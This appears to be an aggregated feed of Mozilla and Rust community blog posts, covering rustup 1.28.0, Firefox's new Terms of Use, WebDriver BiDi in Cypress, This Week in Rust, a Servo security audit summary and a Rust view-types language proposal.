First, I know that pretty much everyone is (understandably) freaking out about stuff that is getting worse, but I just wanted to share some good news in the form of an old-fashioned open-source success story. I’m a fairly boring person and developed most of my software habits in the late 1990s and early 2000s, so it’s pretty rare that I actually hit a bug.

But so far this blog has hit two: one browser compatibility issue and this one. The script for rebuilding when a file changes depends on the inotifywait utility, and it turned out that until recently it breaks when you ask it to watch more than 1024 files.

  1. I filed a bug

  2. A helpful developer, Jan Kratochvil, wrote a fix and put in a pull request.

  3. A bot made test packages and commented with instructions for me on how to test the fix.

  4. I commented that the new version works for me

  5. The fix just went into Fedora. Pretty damn slick.

This is a great improvement over how this kind of thing used to work. I hardly had to do anything. These kids today don’t know how good they have it.

story number 2: why support the Linux desktop?

Amazon Chime is shutting down. Did anyone use it? I get invited to a lot of video conferences, and I never got invited to an Amazon Chime meeting. Even though Amazon.com is normally really good at SaaS, this one didn’t take off. What happened?

It looks like Amazon Chime was an interesting example of Nassim Nicholas Taleb’s intransigent minority effect.

The system requirements for Amazon Chime look pretty reasonable, right? Should get 95% of the client systems out there. The number of desktop Linux users is pretty small. But if you have 20 meetings a week, at 95% compatibility you’re going to average a compatibility issue every week. Even worse, the people you most want to make a good first impression on are the people whose client platform you’re least likely to know.

And if you do IT support for a company with 100 people organizing meetings, Amazon Chime is going to cause way too many support issues to put up with. Taleb uses the examples of kosher and halal food—only a small fraction of the population will only eat kosher or halal, but when planning food for a large group, the most practical choice is to satisfy the minority.

The minority rule will show us how it all it takes is a small number of intolerant virtuous people with skin in the game, in the form of courage, for society to function properly.

Anyway, something to keep in mind in the future for anyone considering moving the support desktop Linux or support Firefox tickets to backlog. None of the successul video conferencing platforms give me any grief for my Linux/Firefox/privacy nerdery client-side setup.

Bonus links

Liam Proven and Thomas Claburn cover the latest web browser surveillance drama: Mozilla flamed by Firefox fans after reneging on promises to not sell their data Mozilla doesn’t sell data about you (in the way that most people think about selling data), and we don’t buy data about you, he said. We changed our language because some jurisdictions define sell more broadly than most people would usually understand that word. (Don’t forget to turn off advertising features in Firefox.)

David Roberts interviews Mustafa Amjad and Waqas Moosa about Pakistan’s solar boom. What has prompted this explosion of distributed solar is some combination of punishingly high prices for grid power and solar panels getting very, very, very cheap. A glut of Chinese overcapacity means that the price of panels in Pakistan has gone from 24 cents a watt to 10 cents a watt in just the past year or two. Distributed solar is breaking over Pakistan like a tidal wave, despite utilities and a grid that do not seem entirely prepared for it.

AI and Esoteric Fascism by Baldur Bjarnason. When I first began to look into Large Language Models (LLMs) and Diffusion Model back in 2022, it quickly became obvious that much of the rhetoric around LLMs was… weird. Or, if we’re being plain-spoken, much of what the executives and engineers at the organisations making these systems were saying was outright weirdo cult shit…

Poll: Small business owners feel more uncertain about the future The NFIB said small business owners are feeling less confident about investing in their business due to uncertain business conditions in the coming months.

It is no longer safe to move our governments and societies to US clouds by Bret Hubert. With all sorts of magic legal spells like DPIAs and DTIAs, organizations attempt to justify transferring our data and processes to the US. There is a whole industry that has been aiding and abetting this process for years. People also fool themselves that special keys and “servers in the EU” will get you “a safe space” within the American cloud. It won’t.

Max Murphy says Goodbye Surveillance Capitalism, Hello Surveillance Fascism Surveillance fascism thrives where corporate greed and state power merge.

This came out in 2020 but worth re-reading today: Puncturing the Paradox: Group Cohesion and the Generational Myth by Harry Guild. The highest group cohesion by profession is in Marketing. This is advertising’s biggest problem in a single chart. This is the monoculture. How can we possibly understand, represent and sell to an entire country when we exist in such a bubble? We like to style ourselves as free thinkers, mavericks and crazies, but the grim truth is that we’re a more insular profession than farming and boast more conformists than the military.

Tech continues to be political by Miriam Eric Suzanne. Maybe we should consider the beliefs and assumptions that have been built into a technology before we embrace it? But we often prefer to treat each new toy as as an abstract and unmotivated opportunity. If only the good people like ourselves would get involved early, we can surely teach everyone else to use it ethically!

Important reminder at Sauropod Vertebra Picture of the Week. If you believe in “Artificial Intelligence”, take five minutes to ask it about stuff you know well Because LLMs get catastrophically wrong answers on topics I know well, I do not trust them at all on topics I don’t already know. And if you do trust them, I urge you to spend five minutes asking your favourite one about something you know in detail. (This is a big part of the reason I don’t use LLMs for search or research. A lot of the material isn’t just wrong, but reflects old, wrong, but often repeated assumptions that you need to know a lot about a field to know not to apply.)

Wendy Davis covers Meta Sued Over Discriminatory College Ads. A civil rights group has sued Meta Platforms over ad algorithms that allegedly discriminate by disproportionately serving ads for for-profit colleges to Black users and ads for public colleges to white users. Situations like this are a big part of the reason why people should
stop putting privacy-enhancing advertising technologies in web browsers—they mainly obfuscate discrimination and fraud.)

Cities Can Cost Effectively Start Their Own Utilities Now by Kevin Burke. Most PG&E ratepayers don’t understand how much higher the rates they pay are than what it actually costs PG&E to generate and transmit the electricity to their house. When I looked into this recently I was shocked. The average PG&E electricity charge now starts at 40 cents per kilowatt hour and goes up from there. Silicon Valley Power, Santa Clara’s utility company, is getting power to customers for 17 cents per kilowatt hour. Sacramento’s utility company charges about the same.

Pluralistic: MLMs are the mirror-world version of community organizing (04 Feb 2025) by Cory Doctorow. The rise of the far right can’t be separated from the history of MLMs.

Jeffrey Emanuel covers A bear case for Nvidia: competition from hardware startups, inference-heavy “reasoning” models, DeepSeek’s training and inference efficiency breakthroughs, more. There are certainly many historical cases where a very important new technology changed the world, but the main winners were not the companies that seemed the most promising during the initial stages of the process.

Three years on, Europe looks to Ukraine for the future of defense tech by Mike Butcher. But in order to invest in the right technology, Europe will have to look to Ukraine, because that is where future wars are being fought right now. TechCrunch recently put a call out for Ukrainian dual-use and defense tech startups to update us on what they are working on. Below is what they sent us, in their own words. Related: Ukrainian Drones Flew 500 Miles And, In A Single Strike, Damaged 5% Of Russia’s Oil Refining Capacity by David Axe. (Drones are getting longer ranges and better autonomy, fast. Fossil fuel infrastructure is not getting any better protected or faster to repair. In the near future, you’re only going to be in the oil or gas business if nobody who is good at ML and model airplanes has a strong objection to you being in the oil or gas business.)

The Rust Programming Language BlogAnnouncing Rustup 1.28.0

The rustup team is happy to announce the release of rustup version 1.28.0. Rustup is the recommended tool to install Rust, a programming language that is empowering everyone to build reliable and efficient software.

What's new in rustup 1.28.0

This new release of rustup has been a long time in the making and comes with substantial changes.

Before digging into the details, it is worth mentioning that Chris Denton has joined the team. Chris has a lot of experience contributing to Windows-related parts of the Rust Project -- expertise we were previously lacking -- so we're happy to have him on board to help address Windows-specific issues.

The following improvements might require changes to how you use rustup:

  • rustup will no longer automatically install the active toolchain if it is not installed.

    • To ensure its installation, run rustup toolchain install with no arguments.
    • The following command installs the active toolchain both before and after this change:
      rustup show active-toolchain || rustup toolchain install
      # Or, on older versions of PowerShell:
      rustup show active-toolchain; if ($LASTEXITCODE -ne 0) { rustup toolchain install }
      
  • Installing a host-incompatible toolchain via rustup toolchain install or rustup default will now be rejected unless you explicitly add the --force-non-host flag.

Rustup now officially supports the following host platforms:

  • aarch64-pc-windows-msvc
  • loongarch64-unknown-linux-musl

This release also comes with various quality-of-life improvements, to name a few:

  • rustup show's output format has been cleaned up, making it easier to find out about your toolchains' status.
  • rustup doc now accepts a flag and a topic at the same time, enabling quick navigation to specific parts of more books.
  • rustup's remove subcommands now support more aliases such as rm and del.
  • Basic support for nushell has been added.

We have additionally made the following internal changes:

  • The default download backend has been changed from reqwest with native-tls to reqwest with rustls.
    • RUSTUP_USE_CURL and RUSTUP_USE_RUSTLS can still be used to change the download backend if the new backend causes issues. If issues do happen, please let us know.
    • The default backend now uses rustls-platform-verifier to verify server certificates, taking advantage of the platform's certificate store on platforms that support it.
  • When creating proxy links, rustup will now try symlinks first and fall back to hardlinks, as opposed to trying hardlinks first.
  • A new RUSTUP_LOG environment variable can be used to control tracing-based logging in rustup binaries. See the dev guide for more details.

Finally, there are some notable changes to our official website as well:

  • The overall design of the website has been updated to better align with the Rust Project's branding.
  • It is now possible to download the prebuilt rustup-init.sh installer for the aarch64-pc-windows-msvc host platform via https://win.rustup.rs/aarch64.

Further details are available in the changelog!

How to update

If you have a previous version of rustup installed, getting rustup 1.28.0 is as easy as stopping any programs which may be using Rustup (e.g. closing your IDE) and running:

$ rustup self update

Rustup will also automatically update itself at the end of a normal toolchain update:

$ rustup update

If you don't have it already, you can get rustup from the appropriate page on our website.

Rustup's documentation is also available in the rustup book.

Caveats

Rustup releases can come with problems not caused by rustup itself but just due to having a new release. As such, we recommend paying attention to the following potential issues in particular:

These issues should be automatically resolved in a few weeks when the anti-malware scanners are updated to be aware of the new rustup release, and the hosted version is updated across all CI runners.

Thanks

Thanks again to all the contributors who made rustup 1.28.0 possible!

The Mozilla BlogAn update on our Terms of Use

On Wednesday we shared that we’re introducing a new Terms of Use (TOU) and Privacy Notice for Firefox. Since then, we’ve been listening to some of our community’s concerns with parts of the TOU, specifically about licensing. Our intent was just to be as clear as possible about how we make Firefox work, but in doing so we also created some confusion and concern. With that in mind, we’re updating the language to more clearly reflect the limited scope of how Mozilla interacts with user data.

Here’s what the new language will say:

You give Mozilla the rights necessary to operate Firefox. This includes processing your data as we describe in the Firefox Privacy Notice. It also includes a nonexclusive, royalty-free, worldwide license for the purpose of doing as you request with the content you input in Firefox. This does not give Mozilla any ownership in that content. 

In addition, we’ve removed the reference to the Acceptable Use Policy because it seems to be causing more confusion than clarity.

Privacy FAQ

We also updated our Privacy FAQ to better address legal minutia around terms like “sells.” While we’re not reverting the FAQ, we want to provide more detail about why we made the change in the first place.

TL;DR Mozilla doesn’t sell data about you (in the way that most people think about “selling data”), and we don’t buy data about you. We changed our language because some jurisdictions define “sell” more broadly than most people would usually understand that word. Firefox has built-in privacy and security features, plus options that let you fine-tune your data settings.


The reason we’ve stepped away from making blanket claims that “We never sell your data” is because, in some places, the LEGAL definition of “sale of data” is broad and evolving. As an example, the California Consumer Privacy Act (CCPA) defines “sale” as the “selling, renting, releasing, disclosing, disseminating, making available, transferring, or otherwise communicating orally, in writing, or by electronic or other means, a consumer’s personal information by [a] business to another business or a third party” in exchange for “monetary” or “other valuable consideration.”  

Similar privacy laws exist in other US states, including in Virginia and Colorado. And that’s a good thing — Mozilla has long been a supporter of data privacy laws that empower people — but the competing interpretations of do-not-sell requirements does leave many businesses uncertain about their exact obligations and whether or not they’re considered to be “selling data.” 

In order to make Firefox commercially viable, there are a number of places where we collect and share some data with our partners, including our optional ads on New Tab and providing sponsored suggestions in the search bar. We set all of this out in our Privacy Notice. Whenever we share data with our partners, we put a lot of work into making sure that the data that we share is stripped of potentially identifying information, or shared only in the aggregate, or is put through our privacy preserving technologies (like OHTTP). 


We’re continuing to make sure that Firefox provides you with sensible default settings that you can review during onboarding or adjust at any time.

The post An update on our Terms of Use appeared first on The Mozilla Blog.

The Mozilla BlogIntroducing a terms of use and updated privacy notice for Firefox

UPDATE: We’ve seen a little confusion about the language regarding licenses, so we want to clear that up. We need a license to allow us to make some of the basic functionality of Firefox possible. Without it, we couldn’t use information typed into Firefox, for example. It does NOT give us ownership of your data or a right to use it for anything other than what is described in the Privacy Notice.

We’re introducing a Terms of Use for Firefox for the first time, along with an updated Privacy Notice

Why now? Although we’ve historically relied on our open source license for Firefox and public commitments to you, we are building in a much different technology landscape today. We want to make these commitments abundantly clear and accessible. 

While for most companies these are pretty standard legal documents, at Mozilla we look at things differently. We lay out our principles in our Manifesto:

  • Your security and privacy on the internet are fundamental and must not be treated as optional. 
  • You deserve the ability to shape the internet and your own experiences on it — including how your data is used. 
  • We believe that practicing transparency creates accountability and trust.

Firefox will always continue to add new features, improve existing ones, and test new ideas. We remain dedicated to making Firefox open source, but we believe that doing so along with an official Terms of Use will give you more transparency over your rights and permissions as you use Firefox. And actually asking you to acknowledge it is an important step, so we’re making it a part of the standard product experience starting in early March for new users and later this year for existing ones.

In addition to the Terms of Use, we are providing a more detailed explanation of our data practices in our updated Privacy Notice. We tried to make these easy to read and understand — there shouldn’t be any surprises in how we operate or how our product works.

We have always prioritized user privacy and will continue to do so. We use data to make Firefox functional and sustainable, improve your experience, and keep you safe. Some optional Firefox features or services may require us to collect additional data to make them work, and when they do, your privacy remains our priority. We intend to be clear about what data we collect and how we use it. 

Finally, you are in control. We’ve set responsible defaults that you can review during onboarding or adjust in your settings at any time: These simple, yet powerful tools let you manage your data the way you want.

You deserve that choice, and we hope all technology companies will start to provide it. It’s standard operating procedure for us.

The post Introducing a terms of use and updated privacy notice for Firefox appeared first on The Mozilla Blog.

Firefox Developer ExperienceWebDriver BiDi Becomes the Default for Cypress with Firefox

At Mozilla, we know that creating compelling web experiences depends on the ability to test sites across all browsers. This means that enabling excellent cross-browser automation is a key part of how we deliver our vision for the open web.

Today, we are excited to share a significant milestone: Cypress will use WebDriver BiDi as its default automation protocol for Firefox 135 and later, starting with Cypress 14.1.0.

Why WebDriver BiDi?

WebDriver BiDi is a cross-browser automation protocol undergoing standardisation at W3C. It is designed as an update to the existing WebDriver standard that provides the two-way communication and rich feature set required for modern testing tools.

Prior to WebDriver BiDi, browser testing tools such as Cypress often used the Chrome Devtools Protocol (CDP) to gain access to functionality not available in WebDriver. However this comes with a significant disadvantage: as the name suggests the Chrome Devtools Protocol is only available in Chromium-based browsers, significantly limiting its suitability for cross-browser testing. For more information on the relationship between CDP and WebDriver BiDi, see our posts on the hacks blog.

To help bridge this gap, back in 2019 Firefox started to implement a subset of CDP directly in Gecko. This has been used by Cypress as part of their Firefox backend since version 4.0. However with WebDriver BiDi now offering a richer feature set and undergoing continual improvements, we believe that switching to the standard protocol will better serve the needs of Cypress users.

If you use Cypress and run into difficulties, it is temporarily possible to switch back to the CDP backend by setting the environment variable FORCE_FIREFOX_CDP=1. If you need to do this please file a bug. Cypress are planning to deprecate support for this in version 15 and the CDP support in Firefox will be removed after the next ESR release.

You can also check out the Cypress team’s blog post about the change.

Close Collaboration for a Seamless Transition

This achievement would not have been possible without the close collaboration between Mozilla and Cypress. From initial planning to implementation and testing, we worked together to ensure WebDriver BiDi meets the needs of Cypress users. This underscores our commitment to providing developers with powerful and reliable tools for cross-browser testing.

CDP Support Ends with Firefox 141

As we continue transitioning to WebDriver BiDi, support for the experimental Chrome DevTools Protocol in Firefox will officially end with Firefox 141, set for release on July 22nd. The 140 ESR release will continue to have CDP support for its full support lifecycle. Removing the CDP implementation will allow us to focus our efforts entirely on improving WebDriver BiDi.

What’s Next?

We believe that WebDriver BiDi provides a solid foundation for the future of browser testing and automation. We will continue to work closely with automation tools to ensure that it meets their needs for a robust, feature-rich, cross-browser automation protocol.

Stay tuned for further updates as we continue improving the Firefox automation experience. The future of automation is here, and WebDriver BiDi is leading the way!

This Week In RustThis Week in Rust 588

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is hiqlite, a database project combining SQLite with OpenRaft to enable high-availability applications with embedded database.

Thanks to Audun Halland for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization.

If you are a feature implementer and would like your RFC to appear in this list, add a call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Let us know if you would like your feature to be tracked as a part of this list.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

506 pull requests were merged in the last week

Compiler
Library
Rustdoc
Clippy
Rust-Analyzer
Rust Compiler Performance Triage

Fairly quiet week with the exception of an improvement to the very often used Iter::next function which can now be inlined leading to a myriad of performance improvements.

Triage done by @rylev. Revision range: ce36a966..f5729cfe

Summary:

(instructions:u) mean range count
Regressions ❌
(primary)
0.4% [0.2%, 1.0%] 37
Regressions ❌
(secondary)
0.7% [0.2%, 8.6%] 54
Improvements ✅
(primary)
-0.5% [-1.4%, -0.1%] 88
Improvements ✅
(secondary)
-0.6% [-2.3%, -0.1%] 87
All ❌✅ (primary) -0.2% [-1.4%, 1.0%] 125

1 Regression, 1 Improvement, 7 Mixed; 2 of them in rollups 40 artifact comparisons made in total

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Tracking Issues & PRs
Rust
Other Areas

Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.

New and Updated RFCs

Upcoming Events

Rusty Events between 2025-02-26 - 2025-03-26 🦀

Virtual
Asia
Europe
North America
Oceania
South America:

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Rust isn't a "silver bullet" that will solve all of our problems, but it sure will help in a huge number of places, so for new stuff going forward, why wouldn't we want that?

Greg Kroah-Hartmann on the Linux Kernel Mailing List

Thanks to Krishna Sundarram for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Servo BlogServo Security Report: findings and solutions

The Servo project has received several grants from NLnet Foundation, and as part of these grants, NLnet offers different support services. These services include security audits from Radically Open Security.

In one of our projects with NLnet, we were working on adding support for CSS floats and tables in Servo. Once the project was completed, we reached out to Radically Open Security to run a security audit. The focus of the audit was in the code related to that project, so the main components investigated were the CSS code paths in the layout engine and Stylo. As part of this audit, four vulnerabilities were identified:

ID Type Description Threat level
CLN-009 Third-Party Library Vulnerability Servo uses an outdated version of the time crate that is vulnerable to a known issue. Moderate
CLN-004 Arithmetic underflow By calling methods on a TableBuilder object in a specific order, an integer underflow can be triggered, followed by an attempted out-of-bounds access, which is caught by Rust, resulting in a panic. Low
CLN-002 Arithmetic underflow An arithmetic underflow condition is currently impossible to trigger, but may become accessible as its surrounding logic evolves. N/A
CLN-007 Unguarded casting Casting from an unsigned platform pointer-width integer into a fixed-width signed integer may result in erroneous layouts. N/A

If you want to know more details you can read the full report.

The first issue (CLN-009) was related to a known vulnerability in version 0.1 of the time crate that Servo depended on (RUSTSEC-2020-0071). We had removed this in most of Servo, but there was one remaining dependency in WebRender. We have since addressed this vulnerability by removing it from the version of WebRender used in Servo (@mrobinson, #35325), and we will also try to upstream our changes so that Firefox is unaffected.

We have also fixed the second (CLN-004) and third (CLN-002) issues by making the affected code more robust (@Loirooriol, #34247, #35437), in the event web content can trigger them.

The fourth issue (CLN-007) is not urgent, since the values are constrained elsewhere and it would otherwise only affect layout correctness and not security, but it’s worth fixing at some point too.

Servo has long been highlighted for being a memory-safe and concurrency-safe web rendering engine, thanks to the guarantees provided by the Rust programming language, including its ownership system, borrow checker, and built-in data structures that enable safe concurrent programming. These features help prevent memory and concurrency vulnerabilities, such as use-after-free bugs and data races.

We find it promising that this security audit, although smaller and of limited scope, identified no severe vulnerabilities, especially none of that nature, and that we were able to address any vulnerabilities identified. This was a positive experience for Servo and the web, and we’re keen to explore more security auditing for Servo in the future.

Thanks to the folks at Radically Open Security for their work on this audit, and NLnet Foundation for continuously supporting the Servo project.

Niko MatsakisView types redux and abstract fields

A few years back I proposed view types as an extension to Rust’s type system to let us address the problem of (false) inter-procedural borrow conflicts. The basic idea is to introduce a “view type” {f1, f2} Type1, meaning “an instance of Type where you can only access the fields f1 or f2”. The main purpose is to let you write function signatures like & {f1, f2} self or &mut {f1, f2} self that define what fields a given type might access. I was thinking about this idea again and I wanted to try and explore it a bit more deeply, to see how it could actually work, and to address the common question of how to have places in types without exposing the names of private fields.

Example: the Data type

The Data type is going to be our running example. The Data type collects experiments, each of which has a name and a set of f32 values. In addition to the experimental data, it has a counter, successful, which indicates how many measurements were successful.

struct Data {
    experiments: HashMap<String, Vec<f32>>,
    successful: u32,
}

There are some helper functions you can use to iterate over the list of experiments and read their data. All of these return data borrowed from self. Today in Rust I would typically leverage lifetime elision, where the & in the return type is automatically linked to the &self argument:

impl Data {
    pub fn experiment_names(
        &self,
    ) -> impl Iterator<Item = &String> {
       self.experiments.keys()
    }

    pub fn for_experiment(
        &self, 
        experiment: &str,
    ) -> &[f32] {
       experiments.get(experiment).unwrap_or(&[])
    }
}

Tracking successful experiments

Now imagine that Data has methods for reading and modifying the counter of successful experiments:

impl Data {
    pub fn successful(&self) -> u32 {
        self.successful
    }

    pub fn add_successful(&mut self) {
        self.successful += 1;
    }
}

Today, “aggregate” types like Data present a composition hazard

The Data type as presented thus far is pretty sensible, but it can actually be a pain to use. Suppose you wanted to iterate over the experiments, analyze their data, and adjust the successful counter as a result. You might try writing the following:

fn count_successful_experiments(data: &mut Data) {
    for n in data.experiment_names() {
        if is_successful(data.for_experiment(n)) {
            data.add_successful(); // ERROR: data is borrowed here
        }
    }
}

Experienced Rustaceans are likely shaking their head at this point—in fact, the previous code will not compile. What’s wrong? Well, the problem is that experiment_names returns data borrowed from self which then persists for the duration of the loop. Invoking add_successful then requires an &mut Data argument, which causes a conflict.

The compiler is indeed flagging a reasonable concern here. The risk is that add_successful could mutate the experiments map while experiment_names is still iterating over it. Now, we as code authors know that this is unlikely — but let’s be honest, it may be unlikely now, but it’s not impossible that as Data evolves somebody might add some kind of logic into add_successful that would mutate the experiments map. This is precisely the kind of subtle interdependency that can make an innocuous “but it’s just one line!” PR cause a massive security breach. That’s all well and good, but it’s also very annoying that I can’t write this code.

Using view types to flag what is happening

The right fix here is to have a way to express what fields may be accessed in the type system. If we do this, then we can get the code to compile today and prevent future PRs from introducing bugs. This is hard to do with Rust’s current system, though, as types do not have any way of talking about fields, only spans of execution-time (“lifetimes”).

With view types, though, we can change the signature from &self to &{experiments} self. Just as &self is shorthand for self: &Data, this is actually shorthand for self: & {experiments} Data.

impl Data {
    pub fn experiment_names(
       & {experiments} self,
    ) -> impl Iterator<Item = &String> {
       self.experiments.keys()
    }


    pub fn for_experiment(
        & {experiments} self,
        experiment: &str,
    ) -> &[f32] {
        self.experiments.get(experiment).unwrap_or(&[])
    }
}

We would also modify the add_successful method to flag what field it needs:

impl Data {
    pub fn add_successful(
        self: &mut {successful} Self,
    ) {
       self.successful += 1;
    }
}

Getting a bit more formal

The idea of this post was to sketch out how view types could work in a slightly more detailed way. The basic idea is to extend Rust’s type grammar with a new type…

T = &’a mut? T
  | [T]
  | Struct<...>
  | …
  | {field-list} T // <— view types

We would also have some kind of expression for defining a view onto a place. This would be a place expression. For now I will write E = {f1, f2} E to define this expression, but that’s obviously ambiguous with Rust blocks. So for example you could write…

let mut x: (String, String) = (String::new(), String::new());
let p: &{0} (String, String) = & {0} x;
let q: &mut {1} (String, String) = &mut {1} x;

…to get a reference p that can only access the field 0 of the tuple and a reference q that can only access field 1. Note the difference between &{0}x, which creates a reference to the entire tuple but with limited access, and &x.0, which creates a reference to the field itself. Both have their place.

Checking field accesses against view types

Consider this function from our example:

impl Data {
    pub fn add_successful(
        self: &mut {successful} Self,
    ) {
       self.successful += 1;
    }
}

How would we type check the self.successful += 1 statement? Today, without view types, typing an expression like self.successful begins by getting the type of self, which is something like &mut Data. We then “auto-deref”, looking for the struct type within. That would bring us to Data, at which point we would check to see if Data defines a field successful.

To integrate view types, we have to track both the type of data being accessed and the set of allowed fields. Initially we have variable self with type &mut {successful} Data and allow set *. The deref would bring us to {successful} Data (allow-set remains *). Traversing a view type modifies the allow-set, so we go from * to {successful} (to be legal, every field in the view must be allowed). We now have the type Data. We would then identify the field successful as both a member of Data and a member of the allow-set, and so this code would be successful.

If however you tried to modify a function to access a field not declared as part of its view, e.g.,

impl Data {
    pub fn add_successful(
        self: &mut {successful} Self,
    ) {
       assert!(!self.experiments.is_empty()); // <— modified to include this
       self.successful += 1;
    }
}

the self.experiments type-checking would now fail, because the field experiments would not be a member of the allow-set.

We need to infer allow sets

A more interesting problem comes when we type-check a call to add_successful(). We had the following code:

fn count_successful_experiments(data: &mut Data) {
    for n in data.experiment_names() {
        if is_successful(data.for_experiment(n)) {
            data.add_successful(); // Was error, now ok.
        }
    }
}

Consider the call to data.experiment_names(). In the compiler today, method lookup begins by examining data, of type &mut Data, auto-deref’ing by one step to yield Data, and then auto-ref’ing to yield &Data. The result is this method call is desugared to a call like Data::experiment_names(&*data).

With view types, when introducing the auto-ref, we would also introduce a view operation. So we would get Data::experiment_names(& {?X} *data). What is this {?X}? That indicates that the set of allowed fields has to be inferred. A place-set variable ?X can be inferred to a set of fields or to * (all fields).

We would integrate these place-set variables into inference, so that {?A} Ta <: {?B} Tb if ?B is a subset of ?A and Ta <: Tb (e.g., [x, y] Foo <: [x] Foo). We would also for dropping view types from subtypes, e.g., {*} Ta <: Tb if Ta <: Tb.

Place-set variables only appear as an internal inference detail, so users can’t (e.g.) write a function that is generic over a place-set, and the only kind of constraints you can get are subset (P1 <= P2) and inclusion (f in P1). I think it should be relatively straightforward to integrate these into HIR type check inference. When generalizing, we can replace each specific view set with a variable, just as we do for lifetimes. When we go to construct MIR, we would always know the precise set of fields we wish to include in the view. In the case where the set of fields is * we can also omit the view from the MIR.

Abstract fields

So, view types allow us to address these sorts of conflicts by making it more explicit what sets of types we are going to access, but they introduce a new problem — does this mean that the names of our private fields become part of our interface? That seems obviously undesirable.

The solution is to introduce the idea of abstract2 fields. An abstract field is a kind of pretend field, one that doesn’t really exist, but which you can talk about “as if” it existed. It lets us give symbolic names to data.

Abstract fields would be defined as aliases for a set of fields, like pub abstract field_name = (list-of-fields). An alias defines a public symbolic names for a set of fields.

We could therefore define two aliases for Data, one for the set of experiments and one for the count of successful experiments. I think it be useful to allow these names to alias actual field names, as I think that in practice the compiler can always tell which set to use, but I would require that if there is an alias, then the abstract field is aliased to the actual field with the same name.

struct Data {
    pub abstract experiments = experiments,
    experiments: HashMap<String, Vec<f32>>,

    pub abstract successful = successful,
    successful: u32,
}

Now the view types we wrote earlier (& {experiments} self, etc) are legal but they refer to the abstract fields and not the actual fields.

Abstract fields permit refactoring

One nice property of abstract fields is that they permit refactoring. Imagine that we decide to change Data so that instead of storing experiments as a Map<String, Vec<f32>>, we put all the experimental data in one big vector and store a range of indices in the map, like Map<String, (usize, usize)>. We can do that no problem:

struct Data {
    pub abstract experiments = (experiment_names, experiment_data),
    experiment_indices: Map<String, (usize, usize)>,
    experiment_data: Vec<f32>,

    // ...
}

We would still declare methods like &mut {experiments} self, but the compiler now understands that the abstract field experiments can be expanded to the set of private fields.

Frequently asked questions

Can abstract fields be mapped to an empty set of fields?

Yes, I think it should be possible to define pub abstract foo; to indicate the empty set of fields.

How do view types interact with traits and impls?

Good question. There is no necessary interaction, we could leave view types as simply a kind of type. You might do interesting things like implement Deref for a view on your struct:

struct AugmentedData {
    data: Vec<u32>,
    summary: u32,
}

impl Deref for {data} AugmentedData {
    type Target = [u32];

    fn deref(&self) -> &[u32] {
        // type of `self` is `&{data} AugmentedData`
        &self.data
    }
}

OK, you don’t need to integrate abstract fields with traits, but could you?

Yes! And it’d be interesting. You could imagine declaring abstract fields as trait members that can appear in its interface:

trait Interface {
    abstract data1;
    abstract data2;


    fn get_data1(&{data1} self) -> u32;
    fn get_data2(&{data2} self) -> u32;
}

You could then define those fields in an impl. You can even map some of them to real fields and leave some as purely abstract:

struct OneCounter {
    counter: u32,
}

impl Interface for OneCounter {
    abstract data1 = counter;
    abstract data2;

    fn get_data1(&{counter} self) -> u32 {
        self.counter
    }

    fn get_data2(&{data2} self) -> u32 {
        0 // no fields needed
    }
}

Could view types include more complex paths than just fields?

Although I wouldn’t want to at first, I think you could permit something like {foo.bar} Baz and then, given something like &foo.bar, you’d get the type &{bar} Baz, but I’ve not really thought it more deeply than that.

Can view types be involved in moves?

Yes! You should be able to do something like

struct Strings {
    a: String,
    b: String,
    c: String,
}

fn play_games(s: Strings) {
    // Moves the struct `s` but only the fields `a` and `c`
    let t: {a, c} Strings = {a, c} s;

    println!({s.a}); // ERROR: s.a has been moved
    println!({s.b}); // OK.
    println!({s.c}); // ERROR: s.a has been moved

    println!({t.a}); // OK.
    println!({t.b}); // ERROR: no access to field `b`.
    println!({t.c}); // OK.
}

Why did you have a subtyping rules to drop view types from sub- but not super-types?

I described the view type subtyping rules as two rules:

  • {?A} Ta <: {?B} Tb if ?B is a subset of ?A and Ta <: Tb
  • {*} Ta <: Tb if Ta <: Tb

In principle we could have a rule like Ta <: {*} Tb if Ta <: Tb — this rule would allow “introducing” a view type into the supertype. We may wind up needing such a rule but I didn’t want it because it meant that code like this really ought to compile (using the Strings type from the previous question):

fn play_games(s: Strings) {
   let t: {a, c} Strings = s; // <— just `= s`, not `= {a, c} s`.
}

I would expect this to compile because

{a, c} Strings <: {*} Strings <: Strings

but I kind of don’t want it to compile.

Are there other uses for abstract fields?

